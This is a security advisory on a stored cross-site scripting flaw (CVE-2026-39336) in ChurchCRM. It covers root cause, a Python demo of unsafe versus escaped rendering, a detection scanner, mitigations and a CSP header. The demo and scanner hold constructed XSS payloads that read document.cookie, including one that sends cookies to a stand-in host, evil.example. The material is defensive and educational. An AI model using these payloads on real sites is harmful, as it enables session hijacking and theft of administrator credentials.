
CVE-2026-39336: ChurchCRM Stored XSS Vulnerability

CVE-2026-39336 is a stored cross-site scripting vulnerability in ChurchCRM that allows admin-to-admin attacks through writable configuration fields. This article covers the technical details, affected versions, and mitigation.


CVE-2026-39336 Overview

ChurchCRM is an open-source church management system used by religious organizations to manage members, donations, and events. CVE-2026-39336 is a stored cross-site scripting (XSS) vulnerability [CWE-79] affecting versions prior to 7.1.0. The flaw resides in the Directory Reports form fields populated from configuration, Person editor defaults rendered into address fields, and external self-registration form defaults. An authenticated administrator can inject malicious JavaScript into writable configuration fields. The payload executes when other administrators or users render the affected views. The maintainers released ChurchCRM 7.1.0 to remediate the issue.

Critical Impact

An authenticated administrator can store JavaScript payloads in configuration-backed fields, leading to admin-to-admin session compromise and unauthorized actions in the ChurchCRM interface.

Affected Products

  • ChurchCRM versions prior to 7.1.0
  • Directory Reports module (configurable form fields)
  • Person editor and external self-registration form defaults

Discovery Timeline

  • 2026-04-07 - CVE-2026-39336 published to NVD
  • 2026-04-10 - Last updated in NVD database

Technical Details for CVE-2026-39336

Vulnerability Analysis

The vulnerability is a stored XSS issue rooted in improper neutralization of input during web page generation. ChurchCRM accepts administrator-controlled configuration values and renders them into HTML contexts without adequate output encoding. Three rendering paths are affected: Directory Reports form fields driven by configuration, Person editor defaults that populate address fields, and external self-registration form defaults. Because the malicious data persists in configuration storage, the payload executes for every user who later loads the affected forms or reports. The advisory describes this as primarily an admin-to-admin attack path, since writing the offending configuration values requires elevated privileges.

Root Cause

The root cause is missing or insufficient HTML output encoding on configuration-derived values that flow into rendered templates. Trust placed in admin-supplied configuration data allowed raw markup to reach the browser context, where it is parsed and executed as script.
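The pattern behind the root cause, shown as an added Python illustration rather than ChurchCRM's own (PHP) code: a stored configuration value is interpolated into a form field's value attribute, once without output encoding and once with it, and a small HTML-parser check reports whether the result contains anything a browser would execute. The field name and both payloads are constructed for the example.

```python
"""Unsafe vs. hardened rendering of a configuration value into an HTML form field.

Added illustration of the pattern CVE-2026-39336 describes; this is not
ChurchCRM code. The field name and payloads are constructed.
"""
from __future__ import annotations

import html
from html.parser import HTMLParser


def render_field_unsafe(name: str, config_value: str) -> str:
    """The vulnerable pattern: a stored configuration value is interpolated
    into an attribute with no output encoding."""
    return f'<input type="text" name="{name}" value="{config_value}">'


def render_field_safe(name: str, config_value: str) -> str:
    """Hardened form: HTML-encode at the output boundary. quote=True also
    encodes " and ', which is what keeps the value inside the attribute."""
    return f'<input type="text" name="{name}" value="{html.escape(config_value, quote=True)}">'


class _ElementCollector(HTMLParser):
    """Records each start tag with its attributes, the way a browser's
    tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.elements: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, dict(attrs)))


def parse_elements(markup: str) -> list[tuple[str, dict]]:
    collector = _ElementCollector()
    collector.feed(markup)
    collector.close()
    return collector.elements


def script_execution_points(markup: str) -> list[tuple[str, str | None]]:
    """Return (tag, attribute) pairs that would run script: <script> elements
    and on* event-handler attributes. An empty list means the value stayed inert."""
    points = []
    for tag, attrs in parse_elements(markup):
        if tag == "script":
            points.append((tag, None))
        points.extend((tag, a) for a in attrs if a.lower().startswith("on"))
    return points


# Constructed payloads an administrator could store in a writable configuration field.
BREAKOUT_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'  # closes value="...", adds a handler
TAG_PAYLOAD = '"><script>alert(document.cookie)</script>'         # closes the <input>, opens a script element


if __name__ == "__main__":
    for payload in (BREAKOUT_PAYLOAD, TAG_PAYLOAD):
        unsafe = render_field_unsafe("address1", payload)
        safe = render_field_safe("address1", payload)
        print("unsafe:", unsafe, "->", script_execution_points(unsafe))
        print("safe:  ", safe, "->", script_execution_points(safe))
```

The PHP counterpart of `html.escape(value, quote=True)` is `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')`. The point of the example is where the encoding happens: at the output boundary, for every configuration-derived value, regardless of the privilege level of whoever wrote it. Trusting the writer's role is exactly what turned an admin-only setting into an admin-to-admin XSS.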

Attack Vector

Exploitation requires an authenticated user with privileges to modify configuration entries. The attacker stores a JavaScript payload in a writable configuration field consumed by Directory Reports, the Person editor, or the self-registration form defaults. When another administrator opens the affected view, the script runs in that administrator's authenticated session. The only user interaction required is the victim loading the page; no further authentication step stands between the stored payload and its execution. Refer to the ChurchCRM GitHub Security Advisory GHSA-r8cp-gg58-2r2r for technical details.

Detection Methods for CVE-2026-39336

Indicators of Compromise

  • Configuration entries containing HTML tags such as <script>, <img onerror=, or <svg onload= in fields consumed by Directory Reports or Person editor defaults.
  • Unexpected outbound requests from administrator browsers shortly after rendering directory or registration forms.
  • Audit log entries showing configuration changes by accounts that do not normally modify settings.

Detection Strategies

  • Scan the ChurchCRM configuration table for stored values containing HTML or JavaScript syntax (including URL- or entity-encoded forms) in Directory Reports and registration-related keys.
  • Inspect rendered HTML of the Directory Reports, Person editor, and self-registration pages for unencoded markup originating from configuration values.
  • Review web server access logs for sequential requests where a configuration update is followed by repeated views of the affected forms.
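The configuration scan from the indicators and detection strategies above, as an added Python example that is not part of ChurchCRM: it normalizes URL- and entity-encoded values before matching, so a payload stored as `%3Cscript%3E` or `&lt;svg onload=...&gt;` is not missed, and it runs here over a constructed in-memory table whose key names are made up (they are not ChurchCRM's real configuration keys). In practice the rows would come from the ChurchCRM configuration table.

```python
"""Scan stored configuration values for markup or script syntax.

Added example, not ChurchCRM code. It runs over a constructed list of
(key, value) rows; the key names are made up and are not ChurchCRM's real
configuration keys. In practice the rows would be read from the ChurchCRM
configuration table.
"""
import html
import re
import urllib.parse

# Syntax a stored payload needs in order to reach script execution once rendered.
PATTERNS = {
    "html_tag": re.compile(r"<\s*/?\s*[a-z][a-z0-9-]*", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
}


def normalize(value: str, rounds: int = 3) -> str:
    """Strip URL- and entity-encoding layers so obfuscated payloads still match.
    Bounded to `rounds` passes; stops early once decoding is a no-op."""
    current = value
    for _ in range(rounds):
        decoded = html.unescape(urllib.parse.unquote(current))
        if decoded == current:
            break
        current = decoded
    return current


def scan_config(rows):
    """Return one finding per row whose normalized value matches any pattern."""
    findings = []
    for key, value in rows:
        if not isinstance(value, str):
            continue
        normalized = normalize(value)
        hits = [name for name, rx in PATTERNS.items() if rx.search(normalized)]
        if hits:
            findings.append({"key": key, "patterns": hits, "value": value})
    return findings


# Constructed rows. Only the third through sixth should be flagged.
SAMPLE_ROWS = [
    ("directory_report_title", "Parish Directory 2026"),
    ("person_default_city", "Springfield"),
    ("person_default_state", '" autofocus onfocus="alert(document.cookie)'),
    ("directory_report_footer", "<img src=x onerror=\"fetch('//evil.example/'+document.cookie)\">"),
    ("self_registration_note", "%3Cscript%3Ealert(1)%3C%2Fscript%3E"),  # URL-encoded
    ("person_default_country", "&lt;svg onload=alert(1)&gt;"),  # entity-encoded: inert if emitted as-is, live if decoded before output
    ("person_address_hint", "Apt #2, 5'10\" tall"),  # quotes alone are not a finding
]


if __name__ == "__main__":
    for finding in scan_config(SAMPLE_ROWS):
        print(f"{finding['key']}: {', '.join(finding['patterns'])}  <- {finding['value']!r}")
```

Review every finding by hand before deleting anything: a legitimate value can contain a stray `<`, and the entity-encoded case is only dangerous if some rendering path decodes it before output. The scan is a triage tool for the audit step under mitigation, not a replacement for the upgrade.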

Monitoring Recommendations

  • Alert on changes to ChurchCRM configuration tables by administrator accounts outside maintenance windows.
  • Monitor browser-side errors and Content Security Policy violations on administrator workstations accessing ChurchCRM.
  • Track creation of new admin sessions or password resets following access to vulnerable views.

How to Mitigate CVE-2026-39336

Immediate Actions Required

  • Upgrade ChurchCRM to version 7.1.0 or later, which contains the official fix.
  • Audit current configuration values for unexpected HTML or script content and sanitize any suspicious entries.
  • Rotate administrator credentials and invalidate active sessions if tampered configuration data is found.
  • Restrict administrator account access to trusted personnel and enforce multi-factor authentication.

Patch Information

The maintainers fixed the vulnerability in ChurchCRM 7.1.0. Review the ChurchCRM GitHub Security Advisory GHSA-r8cp-gg58-2r2r for upgrade instructions and the specific commits that introduce output encoding on the affected fields.

Workarounds

  • Limit administrative access to a minimum set of trusted users until the upgrade is applied.
  • Apply a strict Content Security Policy that disallows inline script execution in the ChurchCRM web context. Roll it out as Content-Security-Policy-Report-Only first: a policy without 'unsafe-inline' also blocks any inline scripts and event-handler attributes the application itself relies on, and it does not remove the stored payload, it only prevents CSP-enforcing browsers from running it.
  • Place ChurchCRM behind a web application firewall with rules that block HTML and script tokens in configuration update requests. Treat this as a stopgap: such rules are encoding-sensitive and can both miss obfuscated payloads and block legitimate values containing angle brackets or quotes.

```apache
# Example Content-Security-Policy header for Apache httpd (requires mod_headers); blocks inline script execution
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'"
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
